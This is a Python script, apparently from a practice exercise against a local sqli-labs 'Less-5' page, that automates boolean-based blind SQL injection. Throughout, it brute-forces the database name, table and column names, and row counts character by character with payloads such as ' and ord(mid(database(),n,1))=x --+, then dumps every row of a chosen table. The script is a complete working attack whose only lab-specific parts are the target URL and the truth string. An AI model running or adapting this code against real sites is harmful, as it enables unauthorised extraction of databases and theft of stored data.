1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219
| import requests
def db_ascii_list(): ascii_list=[] for i in range(33,127): ascii_list.append(chr(i)) return ascii_list
def db_length(url,str,ascii_list): print("[-]开始爆破数据库名长度.......") num=1 while True: db_payload=url+"' and length(database())=%d --+"%num r=requests.get(db_payload) if str in r.text: db_length=num break else: num+=1 print("[+]数据库长度:%d\n"%db_length) return db_length
def db_name(url,str,ascii_list,db_length): print("[-]开始爆破数据库名.......") db_name='' for i in range(1,db_length+1): for j in ascii_list: db_name_payload=url+"' and ord(mid((database()),%d,1))=%d --+"%(i,ord(j)) #print(db_name_payload) r=requests.get(db_name_payload) if str in r.text: db_name+=j break else: pass print("[+]数据库名:%s\n"%db_name) return db_name
def tb_number(url,str,db_name): print("[-]开始爆破%s数据库有几张表........"%db_name) i=1 while True: tb_payload=url+"' and (select count(table_name) from information_schema.tables where table_schema='%s')=%d --+"%(db_name,i) #print(tb_payload) r=requests.get(tb_payload) if str in r.text: tb_number=i break else: i+=1 print("[+]%s库一共有%d张表\n"%(db_name,tb_number)) return tb_number
def tb_name_length(url,str,db_name,tb_number): print("[-]开始爆破表名长度") j=1 tb_name_length=[] for i in range(tb_number): while True: tb_name_length_payload=url+"' and (select length(table_name) from information_schema.tables where table_schema='%s' limit %d,1)=%d --+"%(db_name,i,j) #print(tb_name_length_payload) r=requests.get(tb_name_length_payload) if str in r.text: tb_name_length.append(j) j=1 break else: j+=1 print("[+]表名长度:%s"%tb_name_length) return tb_name_length
def tb_name(url,str,ascii_list,db_name,tb_number,tb_name_length): print("[-]开始爆破表名") tb_name_list=[] for i in range(tb_number): tb_name='' for j in range(1,tb_name_length[i]+1): for k in ascii_list: tb_name_payload=url+"' and ord(mid((select table_name from information_schema.tables where table_schema='%s' limit %d,1),%d,1))=%d --+"%(db_name,i,j,ord(k)) r=requests.get(tb_name_payload) print(tb_name_payload) if str in r.text: tb_name+=k break else: pass tb_name_list.append(tb_name) print("\n[+]%s库下的%d张表为:%s\n"%(db_name,tb_number,tb_name_list)) return tb_name_list
def column_num(url,str,tb_name_list): print("[-]开始爆破每张表的字段数量........") column_num=[] j=1 for i in tb_name_list: while True: column_num_payload=url+"' and (select count(column_name) from information_schema.columns where table_name='%s')=%d --+"%(i,j) #print(column_num_payload) r=requests.get(column_num_payload) if str in r.text: column_num.append(j) print("[+]%s表对应字段数为:%d"%(i,j)) j=1 break else: j+=1 print("\n[+]%s表对应的字段数:%s\n"%(tb_name_list,column_num)) return column_num
def column_name_length(url,str,tb_name_list,column_num): print("[-]开始爆破每张表的字段长度:") column_name_length=[] k=1 for i in range(len(tb_name_list)): for j in range(column_num[i]): while True: column_name_length_payload=url+"' and (select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)=%d --+"%(tb_name_list[i],j,k) #print(column_name_length_payload) r=requests.get(column_name_length_payload) if str in r.text: column_name_length.append(k) k=1 break else: k+=1 em_list_length=column_name_length[:column_num[0]] re_list_length=column_name_length[column_num[0]:column_num[1]+column_num[0]] ua_list_length=column_name_length[column_num[0]+column_num[1]:column_num[0]+column_num[1]+column_num[2]] us_list_length=column_name_length[column_num[0]+column_num[1]+column_num[2]:] print("[+]%s表的%d个字段的字段长度分别为:%s"%(tb_name_list[0],column_num[0],em_list_length)) print("[+]%s表的%d个字段的字段长度分别为:%s"%(tb_name_list[1],column_num[1],re_list_length)) print("[+]%s表的%d个字段的字段长度分别为:%s"%(tb_name_list[2],column_num[2],ua_list_length)) print("[+]%s表的%d个字段的字段长度分别为:%s"%(tb_name_list[3],column_num[3],us_list_length)) return us_list_length
def column_name(url,str,ascii_list,tb_name_list,us_list_length): print("[-]开始爆破%s表的字段名:"%(tb_name_list[3])) column_name_list=[] for i in range(len(us_list_length)): column_name='' for j in range(1,us_list_length[i]+1): for k in ascii_list: column_name_payload=url+"' and ord(mid((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))=%d --+"%(tb_name_list[3],i,j,ord(k)) print(column_name_payload) r=requests.get(column_name_payload) if str in r.text: column_name+=k break else: pass column_name_list.append(column_name) print("[+]%s表的字段名分别为:%s"%(tb_name_list[3],column_name_list)) return column_name_list
def data_num(url,str,tb_list_name,db_name): print('[-]开始爆破%s数据库的%s表有几条数据:'%(db_name,tb_list_name[3])) i=1 while True: data_num_payload=url+"' and (select count(*) from %s.%s)=%d --+"%(db_name,tb_list_name[3],i) print(data_num_payload) r=requests.get(data_num_payload) if str in r.text: data_num=i break else: i+=1 print('[+]%s数据库的%s表有%d条数据'%(db_name,tb_list_name[3],data_num)) return data_num
def dump_data(url,str,tb_name_list,db_name,column_name_list,data_num,ascii_list): print("[-]开始爆破%s数据库的%s表中数据:"%(db_name,tb_name_list[3])) k=1 data_length=[] dump_data_list=[] dump_data='' for i in column_name_list: for j in range(data_num): while True: dump_data_length_payload=url+"' and ascii(substr((select %s from %s.%s limit %d,1),%d,1)) --+"%(i,db_name,tb_name_list[3],j,k) #print(dump_data_length_payload) r=requests.get(dump_data_length_payload) if str not in r.text: dump_data_length=k-1 k=1 break else: k+=1 data_length.append(dump_data_length) for l in range(1,dump_data_length+1): for c in ascii_list: dump_data_payload=url+"' and ord(mid((select %s from %s.%s limit %d,1),%d,1))=%d --+"%(i,db_name,tb_name_list[3],j,l,ord(c)) #print(dump_data_payload) r=requests.get(dump_data_payload) if str in r.text: dump_data+=c break else: pass dump_data_list.append(dump_data) dump_data='' print( dump_data_list) print("[+]%s数据库的%s表的数据:"%(db_name,tb_name_list[3])) for i in range(13): print("%s\t%s\t%s"%(dump_data_list[i],dump_data_list[13+i],dump_data_list[26+i])) print( dump_data_list)
url="http://127.0.0.1/sqli/Less-5/?id=1"#目标url str="You are in"#布尔型盲注的true&false的判断因素 ascii_list=db_ascii_list() db_length=db_length(url,str,ascii_list) db_name=db_name(url,str,ascii_list,db_length) tb_number=tb_number(url,str,db_name) tb_name_length=tb_name_length(url,str,db_name,tb_number) tb_name_list=tb_name(url,str,ascii_list,db_name,tb_number,tb_name_length) column_num=column_num(url,str,tb_name_list) us_list_length=column_name_length(url,str,tb_name_list,column_num) column_name_list=column_name(url,str,ascii_list,tb_name_list,us_list_length) data_num=data_num(url,str,tb_name_list,db_name) dump_data(url,str,tb_name_list,db_name,column_name_list,data_num,ascii_list)
|